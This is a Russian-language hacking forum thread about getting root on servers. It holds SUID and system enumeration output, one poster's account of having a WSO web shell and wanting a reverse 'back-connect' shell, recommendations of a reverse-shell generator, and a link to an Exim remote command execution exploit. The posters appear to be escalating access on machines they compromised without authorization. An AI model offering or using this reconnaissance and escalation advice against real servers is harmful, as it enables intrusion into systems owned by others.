find: `/var/lib/yum/history/2014-03-25/641': Permission denied
find: `/var/lib/yum/history/2014-03-25/644': Permission denied
find: `/var/lib/yum/history/2014-03-25/471': Permission denied
find: `/var/lib/yum/history/2014-03-25/154': Permission denied
find: `/var/lib/yum/history/2014-03-25/562': Permission denied
find: `/var/lib/yum/history/2014-03-25/465': Permission denied
find: `/var/lib/yum/history/2014-03-25/438': Permission denied
find: `/var/lib/yum/history/2014-03-25/717': Permission denied
find: `/var/lib/yum/history/2014-03-25/678': Permission denied
find: `/var/lib/yum/history/2014-03-25/233': Permission denied
find: `/var/lib/yum/history/2014-03-25/123': Permission denied
find: `/var/lib/yum/history/2014-03-25/173': Permission denied
find: `/var/lib/yum/history/2014-03-25/220': Permission denied
find: `/var/lib/yum/history/2014-03-25/367': Permission denied
find: `/var/lib/yum/history/2014-03-25/489': Permission denied
find: `/var/lib/yum/history/2014-03-25/296': Permission denied
find: `/var/lib/yum/history/2014-03-25/651': Permission denied
find: `/var/lib/yum/history/2014-03-25/241': Permission denied
find: `/var/lib/yum/history/2014-03-25/50': Permission denied
find: `/var/lib/yum/history/2014-03-25/22': Permission denied
find: `/var/lib/yum/history/2014-03-25/9': Permission denied
find: `/var/lib/yum/history/2014-03-25/403': Permission denied
find: `/var/lib/yum/history/2014-03-25/228': Permission denied
find: `/var/lib/yum/history/2014-03-25/736': Permission denied
find: `/var/lib/yum/history/2014-03-25/284': Permission denied
find: `/var/lib/yum/history/2014-03-25/654': Permission denied
find: `/var/lib/yum/history/2014-03-25/329': Permission denied
find: `/var/lib/yum/history/2014-03-25/288': Permission denied
find: `/var/lib/yum/history/2014-03-25/657': Permission denied
find: `/var/lib/yum/history/2014-03-25/317': Permission denied
find: `/var/lib/yum/history/2014-03-25/137': Permission denied
find: `/var/lib/yum/history/2014-03-25/104': Permission denied
find: `/var/lib/yum/history/2014-03-25/520': Permission denied
find: `/var/lib/yum/history/2014-03-25/732': Permission denied
find: `/var/lib/yum/history/2014-03-25/726': Permission denied
find: `/var/lib/yum/history/2014-03-25/152': Permission denied
find: `/var/lib/yum/history/2014-03-25/384': Permission denied
find: `/var/lib/yum/history/2014-03-25/543': Permission denied
find: `/var/lib/yum/history/2014-03-25/658': Permission denied
find: `/var/lib/yum/history/2014-03-25/12': Permission denied
find: `/var/lib/yum/history/2014-03-25/25': Permission denied
find: `/var/lib/yum/history/2014-03-25/548': Permission denied
find: `/var/lib/yum/history/2014-03-25/478': Permission denied
find: `/var/lib/yum/history/2014-03-25/470': Permission denied
find: `/var/lib/yum/history/2014-03-25/499': Permission denied
find: `/var/lib/yum/history/2014-03-25/749': Permission denied
find: `/var/lib/yum/history/2014-03-25/687': Permission denied
find: `/var/lib/yum/history/2014-03-25/208': Permission denied
find: `/var/lib/yum/history/2014-03-25/481': Permission denied
find: `/var/lib/yum/history/2014-03-25/24': Permission denied
find: `/var/lib/yum/history/2014-03-25/565': Permission denied
find: `/var/lib/yum/history/2014-03-25/613': Permission denied
find: `/var/lib/yum/history/2014-03-25/564': Permission denied
find: `/var/lib/yum/history/2014-03-25/294': Permission denied
find: `/var/lib/yum/history/2014-03-25/44': Permission denied
find: `/var/lib/yum/history/2014-03-25/745': Permission denied
find: `/var/lib/yum/history/2014-03-25/167': Permission denied
find: `/var/lib/yum/history/2014-03-25/313': Permission denied
find: `/var/lib/yum/history/2014-03-25/680': Permission denied
find: `/var/lib/yum/history/2014-03-25/694': Permission denied
find: `/var/lib/yum/history/2014-03-25/95': Permission denied
find: `/var/lib/yum/history/2014-03-25/275': Permission denied
find: `/var/lib/yum/history/2014-03-25/333': Permission denied
find: `/var/lib/yum/history/2014-03-25/513': Permission denied
find: `/var/lib/yum/history/2014-03-25/750': Permission denied
find: `/var/lib/yum/history/2014-03-25/460': Permission denied
find: `/var/lib/yum/history/2014-03-25/153': Permission denied
find: `/var/lib/yum/history/2014-03-25/194': Permission denied
find: `/var/lib/yum/history/2014-03-25/434': Permission denied
find: `/var/lib/yum/history/2014-03-25/395': Permission denied
find: `/var/lib/yum/history/2014-03-25/320': Permission denied
find: `/var/lib/yum/history/2014-03-25/416': Permission denied
find: `/var/lib/yum/history/2014-03-25/457': Permission denied
find: `/var/lib/yum/history/2014-03-25/267': Permission denied
find: `/var/lib/yum/history/2014-03-25/248': Permission denied
find: `/var/lib/yum/history/2014-03-25/386': Permission denied
find: `/var/lib/yum/history/2014-03-25/304': Permission denied
find: `/var/lib/yum/history/2014-03-25/202': Permission denied
find: `/var/lib/yum/history/2014-03-25/276': Permission denied
find: `/var/lib/yum/history/2014-03-25/380': Permission denied
find: `/var/lib/yum/history/2014-03-25/756': Permission denied
find: `/var/lib/yum/history/2014-03-25/567': Permission denied
find: `/var/lib/yum/history/2014-03-25/343': Permission denied
find: `/var/lib/yum/history/2014-03-25/219': Permission denied
find: `/var/lib/yum/history/2014-03-25/279': Permission denied
find: `/var/lib/yum/history/2014-03-25/404': Permission denied
find: `/var/lib/yum/history/2014-03-25/723': Permission denied
find: `/var/lib/yum/history/2014-03-25/671': Permission denied
find: `/var/lib/yum/history/2014-03-25/733': Permission denied
find: `/var/lib/yum/history/2014-03-25/176': Permission denied
find: `/var/lib/yum/history/2014-03-25/215': Permission denied
find: `/var/lib/yum/history/2014-03-25/252': Permission denied
find: `/var/lib/yum/history/2014-03-25/55': Permission denied
find: `/var/lib/yum/history/2014-03-25/199': Permission denied
find: `/var/lib/yum/history/2014-03-25/277': Permission denied
find: `/var/lib/yum/history/2014-03-25/439': Permission denied
find: `/var/lib/yum/history/2014-03-25/716': Permission denied
find: `/var/lib/yum/history/2014-03-25/734': Permission denied
find: `/var/lib/yum/history/2014-03-25/160': Permission denied
find: `/var/lib/yum/history/2014-03-25/286': Permission denied
find: `/var/lib/yum/history/2014-03-25/406': Permission denied
find: `/var/lib/yum/history/2014-03-25/10': Permission denied
find: `/var/lib/yum/history/2014-03-25/345': Permission denied
find: `/var/lib/yum/history/2014-03-25/511': Permission denied
find: `/var/lib/yum/history/2014-03-25/758': Permission denied
find: `/var/lib/yum/history/2014-03-25/323': Permission denied
find: `/var/lib/yum/history/2014-03-25/64': Permission denied
find: `/var/lib/yum/history/2014-03-25/746': Permission denied
find: `/var/lib/yum/history/2014-03-25/169': Permission denied
find: `/var/lib/yum/history/2014-03-25/33': Permission denied
find: `/var/lib/yum/history/2014-03-25/462': Permission denied
find: `/var/lib/yum/history/2014-03-25/291': Permission denied
find: `/var/lib/yum/history/2014-03-25/349': Permission denied
find: `/var/lib/yum/history/2014-03-25/740': Permission denied
find: `/var/lib/yum/history/2014-03-25/698': Permission denied
find: `/var/lib/yum/history/2014-03-25/454': Permission denied
find: `/var/lib/yum/history/2014-03-25/490': Permission denied
find: `/var/lib/yum/history/2014-03-25/592': Permission denied
find: `/var/lib/yum/history/2014-03-25/369': Permission denied
find: `/var/lib/yum/history/2014-03-25/647': Permission denied
find: `/var/lib/yum/history/2014-03-25/632': Permission denied
find: `/var/lib/yum/history/2014-03-25/36': Permission denied
find: `/var/lib/yum/history/2014-03-25/170': Permission denied
find: `/var/lib/yum/history/2014-03-25/198': Permission denied
find: `/var/lib/yum/history/2014-03-25/350': Permission denied
find: `/var/lib/yum/history/2014-03-25/679': Permission denied
find: `/var/lib/yum/history/2014-03-25/46': Permission denied
find: `/var/lib/yum/history/2014-03-25/110': Permission denied
find: `/var/lib/yum/history/2014-03-25/79': Permission denied
find: `/var/lib/yum/history/2014-03-25/174': Permission denied
find: `/var/lib/yum/history/2014-03-25/11': Permission denied
find: `/var/lib/yum/history/2014-03-25/492': Permission denied
find: `/var/lib/yum/history/2014-03-25/312': Permission denied
find: `/var/lib/yum/history/2014-03-25/591': Permission denied
find: `/var/lib/yum/history/2014-03-25/433': Permission denied
find: `/var/lib/yum/history/2014-03-25/37': Permission denied
find: `/var/lib/yum/history/2014-03-25/360': Permission denied
find: `/var/lib/yum/history/2014-03-25/411': Permission denied
find: `/var/lib/yum/history/2014-03-25/20': Permission denied
find: `/var/lib/yum/history/2014-03-25/518': Permission denied
find: `/var/lib/yum/history/2014-03-25/364': Permission denied
find: `/var/lib/yum/history/2014-03-25/706': Permission denied
find: `/var/lib/yum/history/2014-03-25/616': Permission denied
find: `/var/lib/yum/history/2014-03-25/240': Permission denied
find: `/var/lib/yum/history/2014-03-25/619': Permission denied
find: `/var/lib/yum/history/2014-03-25/102': Permission denied
find: `/var/lib/yum/history/2014-03-25/755': Permission denied
find: `/var/lib/yum/history/2014-03-25/753': Permission denied
find: `/var/lib/yum/history/2014-03-25/601': Permission denied
find: `/var/lib/yum/history/2014-03-25/362': Permission denied
find: `/var/lib/yum/history/2014-03-25/639': Permission denied
find: `/var/lib/yum/history/2014-03-25/54': Permission denied
find: `/var/lib/yum/history/2014-03-25/39': Permission denied
find: `/var/lib/yum/history/2014-03-25/640': Permission denied
find: `/var/lib/yum/history/2014-03-25/211': Permission denied
find: `/var/lib/yum/history/2014-03-25/560': Permission denied
find: `/var/lib/yum/history/2014-03-25/180': Permission denied
find: `/var/lib/yum/history/2014-03-25/527': Permission denied
find: `/var/lib/yum/history/2014-03-25/269': Permission denied
find: `/var/lib/yum/history/2014-03-25/614': Permission denied
find: `/var/lib/yum/history/2014-03-25/129': Permission denied
find: `/var/lib/yum/history/2014-03-25/222': Permission denied
find: `/var/lib/yum/history/2014-03-25/703': Permission denied
find: `/var/lib/yum/history/2014-03-25/669': Permission denied
find: `/var/lib/yum/history/2014-03-25/197': Permission denied
find: `/var/lib/yum/history/2014-03-25/96': Permission denied
find: `/var/lib/yum/history/2014-03-25/157': Permission denied
find: `/var/lib/yum/history/2014-03-25/533': Permission denied
find: `/var/lib/yum/history/2014-03-25/131': Permission denied
find: `/var/lib/yum/history/2014-03-25/523': Permission denied
find: `/var/lib/yum/history/2014-03-25/325': Permission denied
find: `/var/lib/yum/history/2014-03-25/191': Permission denied
find: `/var/lib/yum/history/2014-03-25/623': Permission denied
find: `/var/lib/yum/history/2014-03-25/295': Permission denied
find: `/var/lib/yum/history/2014-03-25/390': Permission denied
find: `/var/lib/yum/history/2014-03-25/272': Permission denied
find: `/var/lib/yum/history/2014-03-25/3': Permission denied
find: `/var/lib/yum/history/2014-03-25/141': Permission denied
find: `/var/lib/yum/history/2014-03-25/530': Permission denied
find: `/var/lib/yum/history/2014-03-25/537': Permission denied
find: `/var/lib/yum/history/2014-03-25/335': Permission denied
find: `/var/lib/yum/history/2014-03-25/472': Permission denied
find: `/var/lib/yum/history/2014-03-25/300': Permission denied
find: `/var/lib/yum/history/2014-03-25/352': Permission denied
find: `/var/lib/yum/history/2014-03-25/72': Permission denied
find: `/var/lib/yum/history/2014-03-25/192': Permission denied
find: `/var/lib/yum/history/2014-03-25/162': Permission denied
find: `/var/lib/yum/history/2014-03-25/448': Permission denied
find: `/var/lib/yum/history/2014-03-25/557': Permission denied
find: `/var/lib/yum/history/2014-03-25/536': Permission denied
find: `/var/lib/yum/history/2014-03-25/348': Permission denied
find: `/var/lib/yum/history/2014-03-25/80': Permission denied
find: `/var/lib/yum/history/2014-03-25/610': Permission denied
find: `/var/lib/yum/history/2014-03-25/38': Permission denied
find: `/var/lib/yum/history/2014-03-25/701': Permission denied
find: `/var/lib/yum/history/2014-03-25/389': Permission denied
find: `/var/lib/yum/history/2014-03-25/232': Permission denied
find: `/var/lib/yum/history/2014-03-25/285': Permission denied
find: `/var/lib/yum/history/2014-03-25/204': Permission denied
find: `/var/lib/yum/history/2014-03-25/382': Permission denied
find: `/var/lib/rsyslog': Permission denied
find: `/var/lib/mlocate': Permission denied
find: `/var/lib/authconfig': Permission denied
find: `/var/lib/dav': Permission denied
find: `/var/cpanel/notifications': Permission denied
find: `/var/cpanel/vps_optimized': Permission denied
find: `/var/cpanel/userhomes': Permission denied
find: `/var/cpanel/dovecot': Permission denied
find: `/var/cpanel/whm': Permission denied
find: `/var/cpanel/user_notifications': Permission denied
find: `/var/cpanel/ssl/installed/certs': Permission denied
find: `/var/cpanel/ssl/installed/keys': Permission denied
find: `/var/cpanel/ssl/installed/cabundles': Permission denied
find: `/var/cpanel/ssl/system/csrs': Permission denied
find: `/var/cpanel/ssl/system/certs': Permission denied
find: `/var/cpanel/ssl/system/keys': Permission denied
find: `/var/cpanel/ssl/apache_tls': Permission denied
find: `/var/cpanel/ssl/domain_tls': Permission denied
find: `/var/cpanel/ssl/autossl': Permission denied
find: `/var/cpanel/mgmt_queue': Permission denied
find: `/var/cpanel/extended_auth/onetime': Permission denied
find: `/var/cpanel/extended_auth/storage': Permission denied
find: `/var/cpanel/modsec': Permission denied
find: `/var/cpanel/addonscriptsversions': Permission denied
find: `/var/cpanel/addoncpanelversions': Permission denied
find: `/var/cpanel/bandwidth.cache': Permission denied
find: `/var/cpanel/gpg': Permission denied
find: `/var/cpanel/bwusagecache': Permission denied
find: `/var/cpanel/sessions': Permission denied
find: `/var/cpanel/mysql': Permission denied
find: `/var/cpanel/hulkd/cache': Permission denied
find: `/var/cpanel/users': Permission denied
find: `/var/cpanel/php/sessions': Permission denied
find: `/var/cpanel/exim_hidden': Permission denied
find: `/var/cpanel/php-fpm': Permission denied
find: `/var/cpanel/domain_keys/private': Permission denied
find: `/var/cpanel/domain_keys/public': Permission denied
find: `/var/cpanel/databases': Permission denied
find: `/var/cpanel/version/addons_update': Permission denied
find: `/var/cpanel/Counters': Permission denied
find: `/var/cpanel/users.cache': Permission denied
find: `/var/cpanel/configs.cache': Permission denied
find: `/var/cpanel/dnsadmin': Permission denied
find: `/var/cpanel/overquota': Permission denied
find: `/var/cpanel/passtokens': Permission denied
find: `/var/cpanel/adminsessions': Permission denied
find: `/var/cpanel/userdata.orphaned': Permission denied
find: `/var/cpanel/pkgacct_sessions': Permission denied
find: `/var/cpanel/modsec_vendors': Permission denied
find: `/var/cpanel/logs': Permission denied
find: `/var/cpanel/.application-locks': Permission denied
find: `/var/cpanel/roundcube': Permission denied
find: `/var/cpanel/addonmoduleversions': Permission denied
find: `/var/cpanel/cpses': Permission denied
find: `/var/cpanel/backups': Permission denied
find: `/var/cpanel/secdatadir': Permission denied
find: `/var/cpanel/lastrun': Permission denied
find: `/var/cpanel/analytics/data': Permission denied
find: `/var/cpanel/analytics/logs': Permission denied
find: `/var/cpanel/analytics/run': Permission denied
find: `/var/cpanel/log_rotation': Permission denied
find: `/var/cpanel/clusterserver': Permission denied
find: `/var/cpanel/pw.cache': Permission denied
find: `/var/cpanel/userdata': Permission denied
find: `/var/cpanel/email_send_limits': Permission denied
find: `/var/cpanel/market': Permission denied
find: `/var/cpanel/logaholic': Permission denied
find: `/var/cpanel/transfer_sessions': Permission denied
find: `/var/cpanel/taskqueue': Permission denied
find: `/var/cpanel/updatelogs': Permission denied
find: `/var/cpanel/conf': Permission denied
find: `/var/cpanel/authn': Permission denied
find: `/var/cpanel/activate': Permission denied
find: `/var/cpanel/addonwhmversions': Permission denied
find: `/var/cpanel/dnsrequests_db': Permission denied
find: `/var/cpanel/user_pw_cache': Permission denied
find: `/var/cpanel/maxemailstracker': Permission denied
find: `/var/cpanel/@pwcache': Permission denied
find: `/var/cpanel/public_contact': Permission denied
find: `/var/cpanel/maxemailsperdomain': Permission denied
find: `/var/cpanel/easy/apache/cache': Permission denied
find: `/var/cpanel/caches': Permission denied
find: `/var/cpanel/serviceauth': Permission denied
find: `/var/cpanel/php-fpm.d': Permission denied
find: `/var/cpanel/packages': Permission denied
find: `/var/cpanel/bandwidth': Permission denied
find: `/var/cpanel/file-download': Permission denied
find: `/var/cpanel/leechprotect': Permission denied
find: `/var/cpanel/.cpanel': Permission denied
find: `/var/named': Permission denied
find: `/var/spool/cron': Permission denied
find: `/var/spool/exim/input': Permission denied
find: `/var/spool/exim/msglog': Permission denied
find: `/var/spool/exim/scan': Permission denied
find: `/var/spool/at': Permission denied
find: `/var/empty/sshd': Permission denied
find: `/var/cache/rpcbind': Permission denied
find: `/var/cache/ldconfig': Permission denied
find: `/var/cache/mod_proxy': Permission denied
find: `/var/tmp/yum-rluts-tvVqz4': Permission denied
find: `/var/run/dovecot/token-login': Permission denied
find: `/var/run/dovecot/login': Permission denied
find: `/var/run/pure-ftpd': Permission denied
find: `/var/run/chkservd.services_suspend': Permission denied
find: `/var/run/restartsrv': Permission denied
find: `/var/run/httpd': Permission denied
find: `/var/run/chkservd/restart_track': Permission denied
find: `/.spamassassin': Permission denied
-rwsr-xr-x 1 root root 1356032 Jun 6 20:52 /usr/sbin/exim
-rwsr-xr-x 1 root root 9000 Jun 19 2018 /usr/sbin/usernetctl
find: `/usr/local/apache/domlogs': Permission denied
find: `/usr/local/apache/logs/modsec_audit': Permission denied
find: `/usr/local/apache/logs/fcgidsock': Permission denied
find: `/usr/local/apache/logs/archive': Permission denied
-rwsr-xr-x 1 root root 19768 Feb 7 2015 /usr/local/apache/bin/suexec
find: `/usr/local/apache/conf_pre_ea3/sites': Permission denied
find: `/usr/local/apache/conf/sites': Permission denied
-rwsr-xr-x 1 root root 19768 Feb 7 2015 /usr/local/apache.backup/bin/suexec
find: `/usr/local/cpanel': Permission denied
-rws--x--x 1 vcsa root 7352 May 11 2016 /usr/libexec/mc/cons.saver
-rwsr-xr-x 1 root root 257824 Apr 9 17:32 /usr/libexec/openssh/ssh-keysign
-rws--x--x 1 root root 14736 Apr 9 19:59 /usr/libexec/pt_chown
-rwsr-xr-x 1 root root 82752 Jul 23 2015 /usr/bin/quota
-rws--x--x 1 root root 20184 Jan 26 2018 /usr/bin/chfn
-rwsr-xr-x 1 root root 70480 May 11 2016 /usr/bin/chage
-rwsr-xr-x 1 root root 75640 May 11 2016 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 40240 May 11 2016 /usr/bin/newgrp
---s--x--x 1 root root 123832 Jun 22 2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 51784 Aug 23 2016 /usr/bin/crontab
-rwsr-xr-x 1 root root 30768 Nov 23 2015 /usr/bin/passwd
-rwsr-xr-x 1 root root 54464 Mar 22 2017 /usr/bin/at
-rwsr-xr-x 1 root root 77560 Jan 26 2018 /bin/mount
-rwsr-xr-x 1 root root 36488 Mar 22 2017 /bin/ping6
-rwsr-xr-x 1 root root 38520 Mar 22 2017 /bin/ping
-rwsr-xr-x 1 root root 53480 Jan 26 2018 /bin/umount
-rwsr-x--- 1 root wheel 34904 Jun 19 2018 /bin/su
find: `/.gnupg': Permission denied
find: `/.cpt_hardlink_dir_a920e4ddc233afddc9fb53d26c392319 ': Permission denied
find: `/tmp/.spamassassin19387aNt6Lntmp': Permission denied
find: `/tmp/mc-rluts': Permission denied
find: `/tmp/mc-root': Permission denied

BenderMR

03.07.2019, 13:50

Неужели тут нет никого кто бы знал как зарутаться?

Nibiru

27.09.2019, 16:07

Добрый день, есть WSO шел, задача повысить привилегии ну нужен бек конект. Ну сервер не тает соединится бэк конектом, пробовал https://github.com/pentestmonkey/php-findsock-shell тоже безуспешно т.к там nginx У кого ксть кике либо идеи сделать нормальный шел? Заранее спасибо

Imperou$

27.09.2019, 19:57

Nibiru said:
↑ (https://antichat.live/posts/4334592/)
Добрый день, есть WSO шел, задача повысить привилегии ну нужен бек конект. Ну сервер не тает соединится бэк конектом, пробовал
https://github.com/pentestmonkey/php-findsock-shell
тоже безуспешно т.к там nginx У кого ксть кике либо идеи сделать нормальный шел? Заранее спасибо

Не понял, а какая разница, nginx там или нет...

Попробуй https://github.com/0x00-0x00/ShellPop (инструкция там же) и выполнить сгенеренный код через шелл. Меня не раз выручал, бэкконнект устанавливался без проблем, когда иные варианты не срабатывали.

Nibiru

30.09.2019, 09:35

Imperou$ said:
↑ (https://antichat.live/posts/4334662/)
Не понял, а какая разница, nginx там или нет...
Попробуй
https://github.com/0x00-0x00/ShellPop
(инструкция там же) и выполнить сгенеренный код через шелл. Меня не раз выручал, бэкконнект устанавливался без проблем, когда иные варианты не срабатывали.

Это не подходит бэк конект не идет на мой хост пробовал и юдп итд итп, только в локалке видно где-то прописано в правилах, есть еще идее попробовал юдп итд, порт тоже биндит ну закрыт циской.

winstrool

30.09.2019, 12:00

BenderMR said:
↑ (https://antichat.live/posts/4317120/)
Spoiler: продолжение 2

Code:
......
-rwsr-xr-x 1 root root 1356032 Jun 6 20:52 /usr/sbin/exim
....

Понимаю, что не актуально, но чисто на заметку, можно было попробовать эксплоит:

https://packetstormsecurity.com/files/153218/Exim-4.9.1-Remote-Command-Execution.html

user6334

12.10.2019, 13:59

Code:
$ uname -a
Linux ek240119-2 4.15.0-65-generic #74-Ubuntu SMP Tue Sep 17 17:06:04 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

$ ls -la /boot
итого 101072
drwxr-xr-x 4 root root 4096 окт 4 06:02 .
drwxr-xr-x 24 root root 4096 окт 2 06:20 ..
-rw-r--r-- 1 root root 217373 сен 12 14:30 config-4.15.0-64-generic
-rw-r--r-- 1 root root 217362 сен 17 21:12 config-4.15.0-65-generic
drwx------ 3 root root 4096 янв 1 1970 efi
drwxr-xr-x 5 root root 4096 окт 3 06:33 grub
-rw-r--r-- 1 root root 38826123 окт 1 06:14 initrd.img-4.15.0-64-generic
-rw-r--r-- 1 root root 38823483 окт 2 06:20 initrd.img-4.15.0-65-generic
-rw-r--r-- 1 root root 182704 янв 28 2016 memtest86+.bin
-rw-r--r-- 1 root root 184380 янв 28 2016 memtest86+.elf
-rw-r--r-- 1 root root 184840 янв 28 2016 memtest86+_multiboot.bin
-rw------- 1 root root 4062624 сен 12 14:30 System.map-4.15.0-64-generic
-rw------- 1 root root 4064177 сен 17 21:12 System.map-4.15.0-65-generic
-rw------- 1 root root 8330904 сен 12 17:38 vmlinuz-4.15.0-64-generic
-rw------- 1 root root 8359576 сен 17 21:20 vmlinuz-4.15.0-65-generic

$ ls -la --full-time /lib64
итого 8
drwxr-xr-x 2 root root 4096 2018-07-25 08:03:05.000000000 +0500 .
drwxr-xr-x 24 root root 4096 2019-10-02 06:20:15.195644895 +0500 ..
lrwxrwxrwx 1 root root 32 2019-01-24 13:11:42.802432577 +0500 ld-linux-x86-64.so.2 -> /lib/x86_64-linux-gnu/ld-2.27.so

$ mount
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
udev on /dev type devtmpfs (rw,nosuid,relatime,size=1934996k,nr_inodes=483749 ,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode =000)
tmpfs on /run type tmpfs (rw,nosuid,noexec,relatime,size=391424k,mode=755)
/dev/sda2 on / type ext4 (rw,relatime,errors=remount-ro,data=ordered)
securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755)
cgroup on /sys/fs/cgroup/unified type cgroup2 (rw,nosuid,nodev,noexec,relatime,nsdelegate)
cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,name=system d)
pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime)
efivarfs on /sys/firmware/efi/efivars type efivarfs (rw,nosuid,nodev,noexec,relatime)
cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/memory type cgroup (rw,nosuid,nodev,noexec,relatime,memory)
cgroup on /sys/fs/cgroup/hugetlb type cgroup (rw,nosuid,nodev,noexec,relatime,hugetlb)
cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct)
cgroup on /sys/fs/cgroup/rdma type cgroup (rw,nosuid,nodev,noexec,relatime,rdma)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=24,pgrp=1,timeout=0,minproto=5,max proto=5,direct,pipe_ino=13569)
hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime,pagesize=2M)
mqueue on /dev/mqueue type mqueue (rw,relatime)
debugfs on /sys/kernel/debug type debugfs (rw,relatime)
fusectl on /sys/fs/fuse/connections type fusectl (rw,relatime)
configfs on /sys/kernel/config type configfs (rw,relatime)
/dev/sda1 on /boot/efi type vfat (rw,relatime,fmask=0077,dmask=0077,codepage=437,io charset=iso8859-1,shortname=mixed,errors=remount-ro)
binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,relatime)
tmpfs on /run/user/1001 type tmpfs (rw,nosuid,nodev,relatime,size=391424k,mode=700,ui d=1001,gid=1001)
gvfsd-fuse on /run/user/1001/gvfs type fuse.gvfsd-fuse (rw,nosuid,nodev,relatime,user_id=1001,group_id=10 01)
tmpfs on /run/user/1000 type tmpfs (rw,nosuid,nodev,relatime,size=391424k,mode=700,ui d=1000,gid=1000)
tmpfs on /run/user/110 type tmpfs (rw,nosuid,nodev,relatime,size=391424k,mode=700,ui d=110,gid=115)
gvfsd-fuse on /run/user/110/gvfs type fuse.gvfsd-fuse (rw,nosuid,nodev,relatime,user_id=110,group_id=115 )

$ df -h
Файл.система Размер Использовано Дост Использовано% Cмонтировано в
udev 1,9G 0 1,9G 0% /dev
tmpfs 383M 3,0M 380M 1% /run
/dev/sda2 110G 13G 92G 12% /
tmpfs 1,9G 111M 1,8G 6% /dev/shm
tmpfs 5,0M 4,0K 5,0M 1% /run/lock
tmpfs 1,9G 0 1,9G 0% /sys/fs/cgroup
/dev/sda1 511M 6,1M 505M 2% /boot/efi
tmpfs 383M 24K 383M 1% /run/user/1001
tmpfs 383M 0 383M 0% /run/user/1000
tmpfs 383M 4,0K 383M 1% /run/user/110

$ cat /etc/issue
Ubuntu 18.04.2 LTS \n \l

$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

$ cat /proc/version
Linux version 4.15.0-65-generic (buildd@lgw01-amd64-006) (gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)) #74-Ubuntu SMP Tue Sep 17 17:06:04 UTC 2019

$ cat /proc/sys/vm/mmap_min_addr
65536

$ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
-rwsr-xr-- 1 root messagebus 42992 июн 10 23:05 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-sr-x 1 root root 105336 июн 5 11:41 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 14328 мар 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 10232 мар 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-sr-x 1 root root 10232 мая 31 16:10 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-x 1 root root 436552 мар 4 2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 6312 ноя 13 2018 /usr/local/share/tsc/printer/thermalprinterut
-rwsr-xr-x 1 root root 22520 мар 27 2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root 76496 мар 23 2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 75824 мар 23 2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 149080 янв 18 2018 /usr/bin/sudo
-rwsr-xr-x 1 root root 18448 июн 28 16:05 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 22528 июн 28 16:05 /usr/bin/arping
-rwsr-xr-x 1 root root 40344 мар 23 2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 мар 23 2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 44528 мар 23 2019 /usr/bin/chsh
-rwsr-xr-- 1 root dip 378600 июн 12 2018 /usr/sbin/pppd
-rwsr-xr-x 1 root root 30800 авг 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 44664 мар 23 2019 /bin/su
-rwsr-xr-x 1 root root 43088 окт 16 2018 /bin/mount
-rwsr-xr-x 1 root root 64424 июн 28 16:05 /bin/ping
-rwsr-xr-x 1 root root 26696 окт 16 2018 /bin/umount
-rwsr-xr-x 1 root root 227832 июл 13 04:16 /opt/google/chrome/chrome-sandbox
-rwsr-xr-x 1 root root 19800 дек 10 2015 /opt/brick/bin/chrome-sandbox

Подскажите, что с этим можно сделать?

kacergei

29.10.2019, 01:00

.SpoilerTarget" type="button">Spoiler: Info

Code:
pastebin.com/JGwa0EXr

Ребят подскажите, есть варианты побороть данную машину?

Muracha

15.12.2019, 09:58

